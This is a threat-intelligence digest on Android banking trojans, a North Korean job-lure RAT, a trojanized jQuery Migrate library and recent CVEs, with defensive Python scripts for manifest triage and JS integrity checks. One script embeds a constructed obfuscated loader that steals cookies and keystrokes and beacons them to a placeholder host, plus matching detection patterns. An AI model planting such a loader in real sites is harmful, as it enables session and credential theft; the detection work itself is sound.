Cyware Daily Threat Intelligence, June 20, 2025


A new Android trojan is turning devices into data-harvesting tools under attackers’ full control. Attributed to the LARVA-398 group, AntiDot has infected thousands of devices through phishing and malicious ads. Using Accessibility Services and screen recording APIs, it steals credentials, intercepts messages, and mimics app logins.

A fake job offer could now come bundled with custom-built spyware. PylangGhost is targeting crypto professionals in India. Delivered through spoofed job sites, the malware includes registry tampering, remote control, and data exfiltration modules aimed at compromising Windows systems.

A critical vulnerability in the AI Engine WordPress plugin is exposing sites to full takeover. Versions 2.8.0 to 2.8.3 allow privilege escalation through the plugin's MCP module: when that module is enabled, even subscriber-level users can run admin-level commands. The plugin is installed on over 100,000 websites, so the flaw opens the door to site-wide compromise wherever the module has been switched on.

Top Malware Reported in the Last 24 Hours

AntiDot Android trojan: New MaaS emerges

The AntiDot Android trojan, attributed to the LARVA-398 threat group, has infected over 3,775 devices through 273 distinct attacks, focusing on personal and financial data theft. It operates on a MaaS model, disseminated via malicious ads and targeted phishing campaigns. AntiDot leverages the Android MediaProjection API and Accessibility Services to record screens, intercept SMS messages, and execute keylogging. It can replace authentic app interfaces with counterfeit login pages to capture credentials and sets itself as the default SMS application to monitor and manipulate communications. The malware is controlled through a C2 panel developed on the MeteorJS framework, enabling attackers to configure attacks and manage infected devices effectively.
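The capability trio described above (an Accessibility Service, a default-SMS-app claim, and screen capture via MediaProjection) can be checked statically once an APK's binary manifest has been decoded, for example with apktool. The script below is an added example, not code from the AntiDot report or from any vendor: the two manifests it parses are constructed with hypothetical package names, and the MediaProjection check is a heuristic, because the projection grant itself happens at runtime and only the Android 14+ foreground-service declaration shows up in the manifest.

```python
"""Static triage of a decoded AndroidManifest.xml for the capability trio the
AntiDot write-up describes: an Accessibility Service, a default-SMS-app claim
and screen capture via MediaProjection.  Added example; the two manifests below
are constructed, not taken from an AntiDot sample (hypothetical package names)."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed: a dropper-style manifest claiming all three capabilities.
SUSPECT_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notabank">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"/>
  <application android:label="System Update">
    <service android:name=".A11y"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <service android:name=".Cap" android:foregroundServiceType="mediaProjection"/>
    <receiver android:name=".SmsRx" android:permission="android.permission.BROADCAST_SMS">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_DELIVER"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed: a benign OTP reader that only listens for incoming SMS.
BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.otpreader">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="OTP Helper">
    <receiver android:name=".OtpRx">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def triage_manifest(xml_text: str) -> dict:
    """Return which AntiDot-style capabilities the manifest declares and a 0-3 score."""
    root = ET.fromstring(xml_text)
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    services = list(root.iter("service"))
    actions = {e.get(A + "name") for e in root.iter("action")}

    # 1. Accessibility: only a service guarded by BIND_ACCESSIBILITY_SERVICE can
    #    be bound by the system as an AccessibilityService.
    a11y = any(s.get(A + "permission") == "android.permission.BIND_ACCESSIBILITY_SERVICE"
               for s in services)

    # 2. Default SMS app: the role is only offered to apps with an SMS_DELIVER
    #    receiver, and the app needs the SMS permissions to act on it.
    sms_role = ("android.provider.Telephony.SMS_DELIVER" in actions
                and {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms)

    # 3. Screen capture (heuristic): MediaProjection is granted at runtime, but on
    #    API 34+ the capturing foreground service must declare this type/permission.
    mp = ("android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION" in perms
          or any("mediaProjection" in (s.get(A + "foregroundServiceType") or "")
                 for s in services))

    findings = {"accessibility_service": a11y, "default_sms_candidate": sms_role,
                "media_projection": mp}
    findings["score"] = sum(findings.values())
    findings["verdict"] = {0: "none", 1: "low", 2: "review", 3: "high"}[findings["score"]]
    return findings


if __name__ == "__main__":
    for label, m in (("suspect", SUSPECT_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, triage_manifest(m))
```

Any one of these capabilities has legitimate uses (screen readers, SMS clients, screen-sharing apps), so the score is a triage signal, not a verdict; a sideloaded "update" app that claims all three is what the report describes.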

New version of Godfather malware spotted

The Godfather Android malware has evolved to utilize virtualization, creating isolated environments on devices to hijack over 500 banking, cryptocurrency, and e-commerce applications worldwide. It employs an embedded virtualization framework, leveraging tools like VirtualApp and Xposed for API hooking, allowing it to intercept sensitive data such as credentials, PINs, and transaction details while displaying the legitimate app interface to the user. By using a StubActivity, the malware tricks Android into believing the real app is running, capturing user interactions and manipulating transactions.

Famous Chollima deploys new PylangGhost

Cisco Talos discovered a Python-based RAT named PylangGhost, used by the North Korea-aligned group Famous Chollima. PylangGhost is functionally similar to the GolangGhost RAT but is tailored for Windows, while the Golang version targets macOS. The threat actors target professionals in the cryptocurrency and blockchain industries, mostly in India, using fake job interviews. Fake job sites impersonate legitimate companies such as Coinbase and Robinhood, tricking users into executing malicious commands. PylangGhost consists of six Python modules, including "nvidia.py," which handles registry modifications, communication with the C2 server, and remote-control functionality.

Malware hidden in jQuery Migrate

Trellix researchers discovered a malware infection that used a tampered copy of the jQuery Migrate library, distributed through a compromised WordPress site. The attack leveraged the Parrot TDS, which selectively delivered the payload based on visitor attributes such as device and browser. The malicious script was hidden inside the otherwise legitimate jQuery Migrate code, using obfuscation to evade detection and dynamically execute payloads. It could steal cookies, session data, and credentials, log keystrokes, display phishing content, and deploy additional malicious scripts. The infection abused WordPress's Autoptimize plugin, whose cache folders were left open to manipulation, so the malware was served from the site's own trusted domain.
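One way to catch the pattern above (a trusted library served from the site's own domain with obfuscated code spliced in) is to pin the hash of each third-party library you ship and to scan anything that does not match, or that a bundler such as Autoptimize produced, for obfuscation and exfiltration markers. The script below is an added example, not Trellix's tooling: CLEAN_LIB and INJECTED_TAIL are constructed stand-ins, KNOWN_GOOD therefore holds the hash of the stand-in rather than of a real jQuery Migrate release, and the beacon host in the injected tail is a placeholder, not an indicator from the report.

```python
"""Integrity and content triage for JavaScript served from a site's own domain,
for example an Autoptimize cache directory, modelled on the trojanized jQuery
Migrate case.  Added example, not Trellix's tooling.  CLEAN_LIB is a constructed
stand-in for the upstream file (so KNOWN_GOOD is its hash, not the real release
hash); INJECTED_TAIL is a constructed loader and the host in it is a placeholder."""
import hashlib
import re
from pathlib import Path

CLEAN_LIB = """/*! constructed stand-in for jQuery Migrate, not the real file */
(function(factory){ factory(window.jQuery); })(function(jQuery){
  jQuery.migrateVersion = "3.4.1";
  jQuery.migrateWarnings = [];
});
"""

# Hex-escaped strings hide "document" and "cookie"; keystrokes are appended to
# the stolen cookie jar and beaconed out; a second stage is eval'd from base64.
INJECTED_TAIL = r"""
;(function(){var _0x1a=["\x64\x6f\x63\x75\x6d\x65\x6e\x74","\x63\x6f\x6f\x6b\x69\x65"];
var c=window[_0x1a[0]][_0x1a[1]];document.addEventListener("keydown",function(e){c+=e.key});
setInterval(function(){(new Image).src="https://tds.example.invalid/c?"+btoa(c)},5000);
eval(atob("Ly8gc3RhZ2UgMg=="))})();
"""
TROJANIZED_LIB = CLEAN_LIB + INJECTED_TAIL


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


# Pinned hashes keyed by library name.  In production, fill this from the
# upstream release artefacts, never from the copy found on the server.
KNOWN_GOOD = {"jquery-migrate": sha256(CLEAN_LIB)}

OBFUSCATION_MARKERS = [
    (r"\beval\s*\(", "eval"),
    (r"\batob\s*\(", "atob"),
    (r"String\.fromCharCode", "fromCharCode"),
    (r"(?:\\x[0-9a-fA-F]{2}){6,}", "hex-escaped string"),
    (r"\b_0x[0-9a-f]{2,}", "_0x-style identifier"),
]
# Checked on the hex-decoded text so escaped or split names still match.
EXFIL_MARKERS = [
    (r"document\.cookie|[\"']cookie[\"']", "cookie access"),
    (r"addEventListener\(\s*[\"'](?:keydown|keypress|keyup)", "keystroke hook"),
    (r"new\s+Image\b|\.sendBeacon\(|XMLHttpRequest|\bfetch\(", "network sink"),
]


def decode_hex_escapes(text: str) -> str:
    """Turn \\xNN escapes back into characters so obfuscated names become visible."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def scan_js(name: str, text: str) -> dict:
    """Hash-compare against the pin (if any) and look for obfuscation + exfil markers."""
    digest = sha256(text)
    expected = KNOWN_GOOD.get(name)
    integrity = "unpinned" if expected is None else ("ok" if digest == expected else "MISMATCH")
    decoded = decode_hex_escapes(text)
    obf = [label for pat, label in OBFUSCATION_MARKERS if re.search(pat, text)]
    exfil = [label for pat, label in EXFIL_MARKERS if re.search(pat, decoded)]
    # A pinned file that changed is suspicious on its own; an unpinned bundle
    # (Autoptimize concatenates files) needs both obfuscation and an exfil path.
    suspicious = integrity == "MISMATCH" or (bool(obf) and bool(exfil))
    return {"name": name, "sha256": digest, "integrity": integrity,
            "obfuscation": obf, "exfil": exfil, "suspicious": suspicious}


def scan_directory(root: str) -> list:
    """Walk a cache directory; map jquery-migrate filenames onto their pin."""
    results = []
    for p in Path(root).rglob("*.js"):
        name = "jquery-migrate" if "jquery-migrate" in p.name.lower() else p.name
        results.append(scan_js(name, p.read_text(errors="replace")))
    return results


if __name__ == "__main__":
    for label, body in (("clean", CLEAN_LIB), ("trojanized", TROJANIZED_LIB)):
        print(label, scan_js("jquery-migrate", body))
```

Point scan_directory() at the web root's cache folder (for Autoptimize that lives under wp-content/cache/ by default); minified bundles will not hash-match anything, which is why the marker pass is kept separate from the pin check. Because the Parrot TDS only serves the payload to selected visitors, fetching the page from a scanner is not a reliable test; reading the files from disk is.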

Top Vulnerabilities Reported in the Last 24 Hours

Multiple bugs in IBM QRadar SIEM

IBM has issued a critical security update for its QRadar SIEM platform to address multiple vulnerabilities, including a severe flaw (CVE-2025-33117, CVSS score: 9.1) that allows a privileged user to execute arbitrary commands. Other vulnerabilities include CVE-2025-36050, which permits a local user to read sensitive information from log files (CVSS score: 6.2), and CVE-2025-33121, which exposes the system to XML External Entity (XXE) injection attacks (CVSS score: 7.1). These vulnerabilities affect QRadar SIEM versions 7.5 through 7.5.0 Update Package 12 IF01.

Vulnerability impacts 100,000 WordPress sites

A critical vulnerability (CVE-2025-5071) has been discovered in the AI Engine plugin for WordPress, affecting versions 2.8.0 to 2.8.3. The flaw allows authenticated users with subscriber-level access or higher to escalate privileges and execute administrative commands via the plugin's Model Context Protocol (MCP) module. The vulnerability has a CVSS score of 8.8, and the plugin is installed on over 100,000 WordPress sites. Exploitation can lead to full site compromise, including unauthorized user creation, content manipulation, and backdoor installation. However, the vulnerability only affects sites where Dev Tools and the MCP module have been manually enabled; both are disabled by default.
